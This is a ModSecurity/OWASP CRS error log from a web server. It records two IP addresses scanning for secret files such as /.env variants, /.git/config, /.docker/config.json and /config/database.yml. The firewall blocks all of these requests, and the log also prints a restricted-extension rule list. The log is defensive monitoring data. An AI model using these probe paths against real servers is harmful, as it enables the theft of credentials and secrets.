[Sat Nov 29 05:39:59.529052 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSp5H0EtJ9CmhQWZAbNCaQAAAAI"]
[Sat Nov 29 05:39:59.529263 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSp5H0EtJ9CmhQWZAbNCaQAAAAI"]
[Sat Nov 29 05:39:59.915367 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSp5H0EtJ9CmhQWZAbNCagAAAAI"]
[Sat Nov 29 05:39:59.915614 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSp5H0EtJ9CmhQWZAbNCagAAAAI"]
[Sat Nov 29 05:39:59.915818 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSp5H0EtJ9CmhQWZAbNCagAAAAI"]
[Sat Nov 29 05:40:00.311358 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "database.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: database.yml found within REQUEST_FILENAME: /config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/database.yml"] [unique_id "aSp5IEEtJ9CmhQWZAbNCawAAAAI"]
[Sat Nov 29 05:40:00.311557 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/database.yml"] [unique_id "aSp5IEEtJ9CmhQWZAbNCawAAAAI"]
[Sat Nov 29 05:40:00.311727 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/database.yml"] [unique_id "aSp5IEEtJ9CmhQWZAbNCawAAAAI"]
[Sat Nov 29 05:40:01.480303 2025] [:error] [pid 398572] [client 3.96.137.215:41852] [client 3.96.137.215] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aSp5IVzUmGeGPC4NGsL9uAAAAAY"]
[Sat Nov 29 05:40:01.481238 2025] [:error] [pid 398572] [client 3.96.137.215:41852] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aSp5IVzUmGeGPC4NGsL9uAAAAAY"]
[Sat Nov 29 05:40:01.481465 2025] [:error] [pid 398572] [client 3.96.137.215:41852] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aSp5IVzUmGeGPC4NGsL9uAAAAAY"]
[Sat Nov 29 05:40:01.708906 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSp5IUEtJ9CmhQWZAbNCbQAAAAI"]
[Sat Nov 29 05:40:01.709128 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSp5IUEtJ9CmhQWZAbNCbQAAAAI"]
[Sat Nov 29 05:40:01.709333 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSp5IUEtJ9CmhQWZAbNCbQAAAAI"]
[Sat Nov 29 10:52:00.247440 2025] [:error] [pid 400368] [client 3.8.164.39:36066] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSrCQB1BxAwBD2eT8veO5gAAAAs"]
[Sat Nov 29 10:52:00.247740 2025] [:error] [pid 400368] [client 3.8.164.39:36066] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSrCQB1BxAwBD2eT8veO5gAAAAs"]
[Sat Nov 29 10:52:00.247928 2025] [:error] [pid 400368] [client 3.8.164.39:36066] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSrCQB1BxAwBD2eT8veO5gAAAAs"]
[Sat Nov 29 10:52:00.249264 2025] [:error] [pid 400366] [client 3.8.164.39:36058] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSrCQHWgHS3psMVK8zqUqAAAAAc"]
[Sat Nov 29 10:52:00.249471 2025] [:error] [pid 400366] [client 3.8.164.39:36058] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSrCQHWgHS3psMVK8zqUqAAAAAc"]
[Sat Nov 29 10:52:00.249652 2025] [:error] [pid 400366] [client 3.8.164.39:36058] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSrCQHWgHS3psMVK8zqUqAAAAAc"]
[Sat Nov 29 10:52:00.415915 2025] [:error] [pid 398572] [client 3.8.164.39:36064] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aSrCQFzUmGeGPC4NGsL9zQAAAAY"]
[Sat Nov 29 10:52:00.416262 2025] [:error] [pid 398572] [client 3.8.164.39:36064] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aSrCQFzUmGeGPC4NGsL9zQAAAAY"]
[Sat Nov 29 10:52:00.416513 2025] [:error] [pid 398572] [client 3.8.164.39:36064] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aSrCQFzUmGeGPC4NGsL9zQAAAAY"]
[Sat Nov 29 10:52:00.416871 2025] [:error] [pid 398281] [client 3.8.164.39:36068] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSrCQJy0DGFOtoiLo6MjOwAAAAM"]
[Sat Nov 29 10:52:00.417051 2025] [:error] [pid 398281] [client 3.8.164.39:36068] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSrCQJy0DGFOtoiLo6MjOwAAAAM"]
[Sat Nov 29 10:52:00.417222 2025] [:error] [pid 398281] [client 3.8.164.39:36068] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSrCQJy0DGFOtoiLo6MjOwAAAAM"]
[Sat Nov 29 10:52:00.418172 2025] [:error] [pid 401924] [client 3.8.164.39:36062] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSrCQCIemDyzFTNDuU4J4QAAAAE"]
[Sat Nov 29 10:52:00.418463 2025] [:error] [pid 398576] [client 3.8.164.39:36060] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSrCQNzvgQgSrnIGPhRUmQAAAAo"]
[Sat Nov 29 10:52:00.418619 2025] [:error] [pid 398576] [client 3.8.164.39:36060] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSrCQNzvgQgSrnIGPhRUmQAAAAo"]
[Sat Nov 29 10:52:00.418778 2025] [:error] [pid 398576] [client 3.8.164.39:36060] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSrCQNzvgQgSrnIGPhRUmQAAAAo"]
[Sat Nov 29 10:52:00.419316 2025] [:error] [pid 401924] [client 3.8.164.39:36062] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSrCQCIemDyzFTNDuU4J4QAAAAE"]
[Sat Nov 29 10:52:00.419461 2025] [:error] [pid 401924] [client 3.8.164.39:36062] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSrCQCIemDyzFTNDuU4J4QAAAAE"]
[Sat Nov 29 10:52:00.419476 2025] [:error] [pid 398280] [client 3.8.164.39:36070] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aSrCQEEtJ9CmhQWZAbNCfgAAAAI"]
[Sat Nov 29 10:52:00.419731 2025] [:error] [pid 398280] [client 3.8.164.39:36070] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aSrCQEEtJ9CmhQWZAbNCfgAAAAI"]
[Sat Nov 29 10:52:00.419911 2025] [:error] [pid 398280] [client 3.8.164.39:36070] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aSrCQEEtJ9CmhQWZAbNCfgAAAAI"]
[Sat Nov 29 10:52:00.734917 2025] [:error] [pid 398575] [client 3.8.164.39:36104] [client 3.8.164.39] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSrCQPf8q--fJYmSMAuGHwAAAAk"]
[Sat Nov 29 10:52:00.735031 2025] [:error] [pid 398278] [client 3.8.164.39:36106] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aSrCQA31ShYAI8brU4C5AQAAAAA"]
[Sat Nov 29 10:52:00.735080 2025] [:error] [pid 398575] [client 3.8.164.39:36104] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSrCQPf8q--fJYmSMAuGHwAAAAk"]
[Sat Nov 29 10:52:00.735249 2025] [:error] [pid 398575] [client 3.8.164.39:36104] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSrCQPf8q--fJYmSMAuGHwAAAAk"]
[Sat Nov 29 10:52:00.735248 2025] [:error] [pid 398278] [client 3.8.164.39:36106] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aSrCQA31ShYAI8brU4C5AQAAAAA"]
